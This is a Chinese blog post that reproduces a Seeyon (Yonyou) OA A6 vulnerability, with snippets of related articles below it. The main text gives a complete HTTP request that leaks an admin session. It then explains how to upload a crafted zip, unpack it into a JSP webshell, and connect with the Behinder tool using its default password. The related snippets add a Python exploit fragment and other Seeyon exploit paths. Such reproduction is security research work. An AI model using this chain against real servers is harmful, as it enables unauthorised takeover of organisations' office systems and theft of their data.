致远(用友)OA或M1 漏洞复现

最新推荐文章于 2024-07-10 23:02:56 发布
最新推荐文章于 2024-07-10 23:02:56 发布
阅读量5k 收藏 1
点赞数
分类专栏: # CMS漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ccz4854/article/details/126244342
版权

1. A6版本漏洞
1.1 Session泄露导致任意文件上传GetShell漏洞
漏洞简介:
致远OA通过发送特殊请求获取session,在通过文件上传接口上传特殊构造的恶意压缩包,并通过解压为webshell控制服务器
根据不同版本的OA (A6、A8 请求链接方式不一样)

漏洞影响:
致远OA A6版本

漏洞复现

第一步:通过固定URL请求获取session:

POST /seeyon/thirdpartyController.do HTTP/1.1
Host: xx.xx.xx.xx:9943
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 133
Content-Type: application/x-www-form-urlencoded
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

可以看到响应包返回了sessionId

在这里插入图片描述

 第二步:利用该管理session上传压缩包 首先利用chrom插件HackBar,制造出POST请求:
https://xx.xx.xx.xx:9943/seeyon/fileUpload.do?method=processUpload,利用Burp抓包,并将请求中的session替换为刚刚获取到的session:

在这里插入图片描述

 放包,这时页面跳出上传失败的样式,可以上传文件,返回上传后的路径值:

在这里插入图片描述

 

下一步通过seeyon自带的解压接口将该file解压为源文件,即layout.xml与test233.jsp。
利用HackBar制作/seeyon/ajax.do 的POST请求,并将arguments参数中的值替换为上传文件后得到的值:

在这里插入图片描述

可以看见响应码为500:

在这里插入图片描述 

这时说明已经解压png文件为jsp文件成功,接下来利用冰蝎3连接:(冰蝎默认密码rebeyond)访问URL+
/seeyon/common/designer/pageLayout/test233.jsp。

 

保持 平常心
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
致远OA任意文件上传
课嗨教育的专栏
05-10 2086
1)通过请求直接获取管理员权限cookie 2)通过上传一个压缩文件,调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshell def seeyon_new_rce(targeturl): orgurl=targeturl #通过请求直接获取管理员权限cookie targeturl=orgurl+'seeyon/thirdpartyController.do' post='method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmc
Goby 漏洞发布|致远 M1 移动端 userTokenService 代码执行漏洞
m0_46699477的博客
07-18 734
致远 M1 Server是一个移动服务。致远 M1 Server userTokenService 代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
致远OA Session泄露 任意文件上传漏洞
maverickpig的博客
07-19 1万+
网络安全自学日志-漏洞复现篇:致远OA Session泄露 任意文件上传漏洞 文章来自https://www.linuxlz.com/aqld/2104.html 工作中遇到的漏洞,记录一下 漏洞描述 致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器 漏洞影响 致远OA 漏洞复现 FOFA title=“致远” 首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的 POST /seeyon/thirdpartyControl
致远漏洞(登陆绕过+任意文件上传)
最新发布
bring_coco的博客
07-10 1446
1.获得cookie每次请求都会得到一个cookie值,都可以用,如下:失败的cookie如下:2.上传zip文件注意这里zip文件直接burp右键paste from file放进去即可这里压缩文件如上3.解压压缩文件可以看到报错找不到指定文件,是因为我们压缩包中没有带layout.xml,其必须存在否则在利用解压漏洞时会解压失败空内容即可注意上传目录:然后我重新生成zip文件再次解压,但是访问不到,应该这里有问题因为解压出来的目录都为空,直接用下面脚本吧。
2021-01-18
weixin_45959257的博客
01-18 2175
致远OA任意文件上传漏洞 漏洞原理 致远OA是一套办公协同管理软件。近日,奇安信CERT监测到致远OA的相关漏洞信息。由于致远OA旧版本某些接口存在未授权访问,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。 修复方法 下载致远OA的最新补丁 漏洞复现 1、构建判断漏洞是否存在 http://xxx.xxx.xxx.xxx/seeyon/thirdpartyController.do.css/..;/ajax.do 如下图的结果则说明可能存在,但只是可能,要进一步操作才能确定
2023 致远OA-任意用户密码重置漏洞
weixin_45908624的博客
09-14 2713
致远OA 短信验证码绕过重置密码漏洞
致远OA 组合getshell
weixin_43227251的博客
04-21 4849
致远OA通杀 最新组合getshell 复现版本: 致远A6-V5协同管理软件.A6 V7.1SP1 Getshell 分三步 1.获取cookie信息 2.上传压缩文件 3.解压压缩文件得到shell 1.获取 cookie 漏洞地址 /seeyon/thirdpartyController.do 数据包: POST /seeyon/thirdpartyController.do HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10
致远协创(原用友致远OA8.0安装包
11-02
致远协创(原用友致远OA8.0安装包,包含A6/A8等版本
用友致远OA介绍(简版).docx
05-26
### 用友致远A6协同管理软件知识点详解 #### 一、软件概览 - **定位**: 用友致远A6协同管理软件是一款专为广泛的企事业单位设计的高效协同工作平台,它旨在通过互联网技术提升组织内部的沟通与工作效率。 - **目标*...
用友致远OA办公系统要案
02-10
### 用友致远OA办公系统关键知识点解析 #### 一、概述 **1.1 目的** 本文档旨在详细介绍用友致远OA办公系统的软件需求规格说明书,该说明书基于前期市场调研以及与多位软件使用者的深入交流而制定。其核心目标...
用友致远OA操作手册V276-1.docx
05-26
用友致远OA操作手册
致远OA 6.1SP1 数据字典
11-11
致远OA 数据字典 6.1SP1 致远OA数据维护致远OA 数据字典 6.1SP1 致远OA数据维护
致远OA漏洞复现
热门推荐
混子
12-31 5万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
探索未知,尽在Seeyoner——高效致远OA漏洞利用工具
gitblog_00020的博客
06-02 520
探索未知,尽在Seeyoner——高效致远OA漏洞利用工具 seeyon-exploit致远OA漏洞检测项目地址:https://gitcode.com/gh_mirrors/se/seeyon-exploit 项目介绍 在网络安全领域中,及时发现并修复系统漏洞是保障信息安全的关键所在。Seeyoner是一款专用于检测和利用致远OA系统漏洞的开源工具,由安全研究者x51精心打造,旨在帮助安全研究...
SeeyonExploit-GUI:一款强大的图形化漏洞利用工具
gitblog_00032的博客
03-28 405
SeeyonExploit-GUI:一款强大的图形化漏洞利用工具 项目地址:https://gitcode.com/linshaoSec/SeeyonExploit-GUI 项目简介 SeeyonExploit-GUI 是一个由林少安全团队开发的开源项目,旨在提供一个友好的图形界面,用于自动化执行漏洞利用。这款工具集成了多种常见的渗透测试和安全研究技术,使得网络安全专业人员可以更高效地进行漏洞测试...
Java_OAexp工具设计及实现-Thelostworld_OA
thelostworld
05-02 3359
本文约1700字,阅读约需6分钟。本文主要介绍基于JavaFX图形化界面开发的快速OA类利用工具。笔者收集和整理了目前工具的OA类验证及其利用的方式和方法,整合成一个方便快捷图形化的快速利用工具。想要写这个工具的原因,主要是日常工作中,OA漏洞利用总是需要去找无数验证脚本,操作繁琐。为了方便日常渗透测试,简单快捷地进行OA利用渗透,方便团队提升效率,笔者撰写了这款工具。设计初期,笔者收集和查看了一些师傅所撰写的OA利用相关工具和文章,都是部分漏洞的利用和探测,比较单一。在这个情况下,笔者把现存披露的漏洞利用
linux卸载致远oa,致远oa(seeyon)文件上传漏洞重现及分析
weixin_39937312的博客
05-06 2323
0x00 影响范围经本人测试,如下v6.1sp2a6+v7sp3A8-v5 v6.1sp1实际范围不止以上版本。0x01 漏洞重现验证:网上流传的exp:DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlVOPTION=S3WYOSWLBSGrcurrentUserId=zUCTwigsziC...
致远OA M1Server RCE漏洞复现(QVD-2023-19300)
0xSec
08-16 4896
致远OA M1Server userTokenService 接口存在反序列化漏洞,未经授权的攻击者构造恶意的序列化数据可造成远程代码执行,最终可以获取服务器权限。
致远oa a8漏洞复现
08-01
致远OA A8存在远程任意文件上传漏洞,攻击者可以利用该漏洞在未授权的情况下上传恶意文件并执行任意代码。漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意文件上传。[1] 要复现致远OA A8漏洞,可以按照以下步骤进行操作: 1. 首先访问目标网站的/seeyon/htmlofficeservlet目录,如果访问成功,说明该网站很有可能存在漏洞。[3] 2. 如果目标网站存在漏洞,可以尝试使用爆破工具或者常见的弱口令进行登录,例如密码为123456等。如果成功登录,说明存在弱口令漏洞。[2] 3. 如果弱口令无果,可以尝试寻找历史的漏洞利用工具(exp),并进行尝试。[2] 请注意,在进行漏洞复现时,务必遵守法律法规,仅用于合法的安全研究和测试目的。未经授权的攻击行为是违法的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值